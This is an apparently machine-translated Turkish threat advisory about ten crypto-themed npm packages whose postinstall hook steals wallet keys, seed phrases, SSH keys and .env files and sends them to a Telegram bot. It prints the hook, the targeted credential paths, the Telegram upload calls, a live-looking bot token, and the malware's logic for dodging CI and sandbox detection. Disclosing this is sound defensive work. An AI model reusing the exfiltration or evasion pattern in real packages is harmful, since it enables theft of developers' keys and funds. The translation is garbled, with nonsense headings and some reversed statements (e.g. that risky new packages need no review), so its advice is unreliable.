SeedSweep: On Zararlı npm Kripto Paketi

SeedSweep: Kimse İzlemediğinde Çalışan On Kripto Para Temalı npm Paketi

TL; DR

9 Haziran 2026'da tek bir npm yayıncı hesabı, aicrypto-xzgggsevk edildi on paket Kripto ve Web3 esintili isimlerle — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9ve altı tane daha.

Her paket aynı yükü çalıştırır. postinstall Kurulum sırasında, CI ortamında mı yoksa bir sanal ortamda mı çalıştığını kontrol eder; eğer değilse, cüzdan anahtar depolarını, kurtarma cümlesi dosyalarını, SSH anahtarlarını okur ve .env Altı farklı blockchain ekosisteminden dosyaları alıp bir Telegram botuna iletiyor.

Savunmacının hemen avlayabileceği tek gösterge Telegram bot kimliğidir. 8227918239.

Önem: kritik — İmza anahtarlarının ve kurtarma ifadelerinin doğrudan çalınması geliştirici iş istasyonları.

Saldırı: Nasıl Çalışıyor?

Bu paketler kendilerini blockchain geliştirici araçları olarak tanıtıyor. paket.json Minimal düzeydedir ve kurulum yaşam döngüsünü bir betiğe yönlendirir:

{   "name": "farming-tools-12",   "main": "src/index.js",   "scripts": { "postinstall": "node scripts/postinstall.js" },   "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"],   "author": "Alex Smith",   "license": "MIT" }

komut dosyaları/kurulum sonrası.js Bu, gerçek veri yükünü yükleyen tek satırlık bir ara koddur: require(“../src/index.js”). çünkü kurulum sonrası otomatik olarak çalışır npm kurulumuGeliştirici tarafından herhangi bir kod içe aktarma işlemi gerekmez; paketi bağımlılık ağacına yerleştirmek, çalıştırılması için yeterlidir.

İçerideki öldürme zinciri src / index.js Dört adımdan oluşmaktadır:

  1. Çevre kontrolü. Bir koruma fonksiyonu, sunucunun bir derleme aracısı mı yoksa analiz sanal ortamı mı gibi görüneceğine karar verir.
  2. Gecikme. Yürütme işlemi bir işlemin arkasına ertelenir. setZaman aşımı yaklaşık 7.4 saniye.
  3. Toplamak. Cüzdan, anahtar ve gizli dosya yollarının sabit bir listesi taranır; mevcut dosyalar sıraya alınır.
  4. Sızma. Sıraya alınmış dosyalar, özet bir mesajla birlikte bir Telegram botuna gönderilir.

Hedeflenen veri toplama listesi altı zinciri ve genel geliştirici sırlarını kapsıyor. Kısaltılmış hali:

~/.config/solana/id.json        ~/.ethereum/keystore ~/.solana/keypair.json          ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore         ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt                ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json  ./keystore.json  ./mnemonic.txt  ./seed.txt ./seedphrase.txt  ./recovery.txt  ./private.key  ./.env  ./.env.local

Toplamda yirmi bir yol. Dizin girdileri, örneğin: ~/.ethereum/keystore Dosyalar genişletilir ve içindeki her dosya sıraya alınır. Veri sızdırma işlemi doğrudan Telegram Bot API'sini kullanır. Mesaj gönder Sunucu ve dosya özetini içeren bir çağrı, ardından bir Belge gönder Her dosya için çok parçalı yükleme:

metin

POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument   (one per file)

Kodun oluşturduğu özet mesaj, şu metin dizesiyle başlar: KRİPTO HIRSIZIArdından sunucu adı, kullanıcı adı, kaynak paket adı, dosya sayısı ve zaman damgası gelir.

burada yeni ne var

Ayırt edici unsur hırsızlık mekanizması değil — npm'den Telegram tabanlı veri sızdırma. kurulum sonrası hooks Çok bilinen bir yer. O, İnfaz kapısı. Herhangi bir işlem yapmadan önce, veri paketi, sunucunun bir CI çalıştırıcısına veya sanal ortama benzediğini tespit ettiğinde true değerini döndüren ve benzemediğinde erken geri dönen bir fonksiyonu çağırır:

metin

isTestEnvironment() is true when ANY of:   - env CI == "true"  OR  GITHUB_ACTIONS == "true"  OR  JENKINS_HOME set   - env NODE_ENV in {test, development}   - username/USER contains: runner, sandbox, test, docker,     jenkins, gitlab, travis, circleci   - hostname contains: sandbox, test, ci   - hostname matches /^[a-f0-9]{12}$/   (a container-id shape)

Konteyner kimliği regex'i dikkat çekici bir maddedir: Docker, varsayılan olarak 12 onaltılık karakterden oluşan bir ana bilgisayar adını atar. konteynerBu nedenle, zararlı yazılım "ana bilgisayar adım bir Docker konteynerine benziyor" ifadesini pasif kalmak için bir neden olarak ele alıyor. Yedi saniyelik gecikmeyle birleştiğinde, tasarım geliştiricinin gerçek iş istasyonunda çalışmayı ve otomatik analiz gibi görünen her yerde sessiz kalmayı destekliyor. Bu engel, dinamik analiz sinyallerini bastırdı ve statik veri sızdırma akışını birincil kanıt olarak korudu.

Tarihçesi

Tarih (UTC) Etkinlikler
2026-06-09 ~02:48 Kümedeki ilk paketler yayınlandığında işaretlendi (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0)
2026-06-09 ~03:21–03:25 Daha yüksek sürümlü üyeler işaretlendi (ethereum-kit-9 1.25.36 şirketinde, wallet-sdk-9 (3.7.73'da)
2026-06-09 ~03:58–03:59 Son üyeler işaretlendi (defi-tools-39 4.26.29 şirketinde, swap-sdk-87 4.63.78 şirketinde, farming-tools-12 (4.68.54'da)
2026-06-09 Sınıflandırılan on tanesinin tamamı zararlı yazılım olarak sınıflandırıldı ve kayıt defterinden kaldırılması için bildirildi.

On tanesinin tamamı yaklaşık yetmiş dakika içinde ortaya çıktı; bu, tek bir hesaptan yapılan, önceden planlanmış bir yayın akışıyla tutarlıydı.

Uzlaşma Göstergeleri

Ağ ve davranışsal göstergeler (konakçı etkisiz hale getirildi):

Gösterge Özellik
Veri sızdırma uç noktası api[.]telegram[.]org (Telegram Bot API)
Telegram bot kimliği 8227918239
Bot belirteci 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs
Telegram sohbet kimliği 6433587894
Kancayı takın postinstallscripts/postinstall.jssrc/index.js
İşaretleyici dize CRYPTO STEALER derlenmiş özet mesajda
Publisher aicrypto-xzggg (belirtilen e-posta) vipsyria88@gmail[.]com(doğrulanmamış)

Paketler ve sürümler, her birinin SHA-256 değeriyle birlikte. src / index.js Veri yükü (veri yükleri işlevsel olarak özdeştir ve yalnızca gömülü paket adı etiketinde farklılık gösterir, bu nedenle her karma değer farklıdır):

html
paket Sürümü src/index.js dosyasının SHA-256 değeri
farming-tools-12 4.68.54 b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4
swap-sdk-87 4.63.78 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c
defi-tools-39 4.26.29 ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee
wallet-sdk-9 3.7.73 ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502
ethereum-kit-9 1.25.36 c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f
ethereum-kit-1 1.0.0 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381
solana-core-4 1.0.0 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d
web3-tools-9 1.0.0 db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d
crypto-utils-7 1.0.0 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92
blockchain-helper-0 1.0.0 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db

Basit bir arama sorgusu: Kurulum günlüklerinde ve kilit dosyalarında on isimden herhangi birini arayın ve Telegram Bot API'sine, normalde kullanmayan derleme veya geliştirici sunucularından gelen giden bağlantıları arayın.

Atıf ve Gözlemlenen Davranış

On paketin tamamı tek bir hesaptan yayınlandı. aicrypto-xzggg, belirtilen e-posta adresi şudur: vipsyria88@gmail[.]comHem e-posta adresi hem de kaynak kontrol bağlantısı kayıt defteri meta verilerinde doğrulanmamış olup, hesabın itibar puanı oldukça düşüktür. Hesabı kimin işlettiğini henüz teyit edemedik.

Kimlik iddiasıyla ilgili olarak iki ayrıntıyı birbirinden ayırmak gerekiyor. Birincisi, paket.json yazar alan okumaları Alex Smith her pakette yer alırken, asıl yayıncılık hesabı ise aicrypto-xzgggYazar alanı, kendi beyanıyla oluşturulmuş bir meta veridir ve yazarlığı kanıtlamaz. İkincisi, sürüm numaraları oldukça değişkendir; bazı üyeler şu kadar sürüme sahiptir: 1.0.0diğerleri 4.68.54 Bu durum, gerçek sürüm geçmişlerini korumak yerine, yeni oluşturulan paket adlarında tek bir veri paketinin yeniden kullanılmasıyla tutarlıdır.

Davranış küme genelinde aynıdır: aynı hedef yol listesi, aynı Telegram bot kimliği ve sohbet kimliği, aynı ortam kapısı, aynı KRİPTO HIRSIZI İşaretleyici. Bu tekdüzelik, paketler arasındaki en güçlü bağlantıdır. Bu bir kimlik değil, aynı operatör sinyalidir.

Savunmacılar için Etki, Trendler ve Rehberlik

Risk somut. Yazılım cüzdanı, kurtarma ifadesi dosyası veya SSH anahtarı içeren bir iş istasyonuna bu paketlerden herhangi birini kuran bir geliştirici, bu dosyaların saniyeler içinde okunup ana bilgisayardan dışarı iletilmesini sağlar. Kurtarma ifadeleri ve imzalama anahtarları, oturum belirteci gibi süresi dolmaz; bir kez... anımsatıcı.txt ya da bir Solana id.json Makineden ayrıldığında, kontrol ettiği fonlar taşınana kadar risk altında kalır. Aynı işlem ayrıca şunları da yakalar: .env API anahtarlarını ve veritabanı kimlik bilgilerini sıklıkla içeren dosyalar.

Bu kümenin arkasında iki eğilim yatıyor. Birincisi, belirli bir kitleyi - cüzdanlarını ve anahtarlarını bağımlılıkları kurdukları aynı makinede tutan geliştiricileri - hedeflemek için kripto ve Web3 temalı isimlerin sürekli kullanımı. İkincisi, kurulum zamanı yüklerinde sanal alandan kaçınmanın olgunlaşması. CI ortam değişkenlerini, çalıştırıcı kullanıcı adlarını ve Docker kapsayıcı kimliği ana bilgisayar adı şeklini kontrol eden bir geçit, gerçek bir iş istasyonundan farklı davranmak için kasıtlı bir çabadır ve tamamen dinamik tespit için çıtayı yükseltir.

Savunmacılar için:

Varsayılan olarak komut dosyaları devre dışı bırakılmış şekilde yükleyin. npm install –ignore-scriptsveya ayarla komut dosyalarını yok say=true in .npmrc, önler kurulum sonrası Yürütme; komut dosyalarını yalnızca gerçekten ihtiyaç duyan belirli bağımlılıklar için etkinleştirin.

Cüzdanları ve imzalama anahtarlarını derleme ve geliştirme makinelerinden ayrı tutun. Donanım cüzdanı veya özel, bağımlılık gerektirmeyen bir imzalama sunucusu kullanın.

Kişiselleştirilmiş ve Yenilikçi Tedavi Çözümleri .envAnahtar depoları ve kurtarma cümlesi dosyaları, adeta taç mücevherleri gibidir. Bunlar asla başka bir dosya türü olan bir dizinde bulunmamalıdır. npm kurulumu çalışan ağaç.

CI ve geliştirici sunucularından Telegram Bot API'sine giden bağlantıları arayın. Çoğu derleme ortamı bunu asla çağırmaz; ancak kurulumdan hemen sonra aniden çağıran bir ortam varsa, araştırılmaya değerdir.

Bağımlılıkları sabitleyin ve inceleyin. Genel bir kripto adına sahip yepyeni bir paket, bir kurulum sonrası Kanca ve hiçbir depo bağlantısı, kilit dosyasına girmeden önce incelenmeyi gerektirmez.

Konteyner kimliği kaçınma maddesi, analistler için de bir hatırlatma niteliğindedir: bir sanal ortamda pasif kalan kurulum zamanı yükü zararsız değildir, seçicidir. Kurulum yolunun statik olarak incelenmesi, dinamik yürütmenin göstermeyi reddedebileceği şeyleri görmenin güvenilir yoludur.

Referanslar

npm install dokümantasyonu — yaşam döngüsü komut dosyaları ve - Komut dosyalarını yoksay— otomatik yüklemeyi devre dışı bırakmaya ilişkin referans hooks. 

sca-tools-software-composition-analysis-tools
Yazılım risklerinizi önceliklendirin, giderin ve güvence altına alın.
Ücretsiz hesabınızı alın.
Hiçbir kredi kartı gerekmektedir.

Yazılım Geliştirme ve Teslimatınızı Güvence Altına Alın

Xygeni Ürün Paketi ile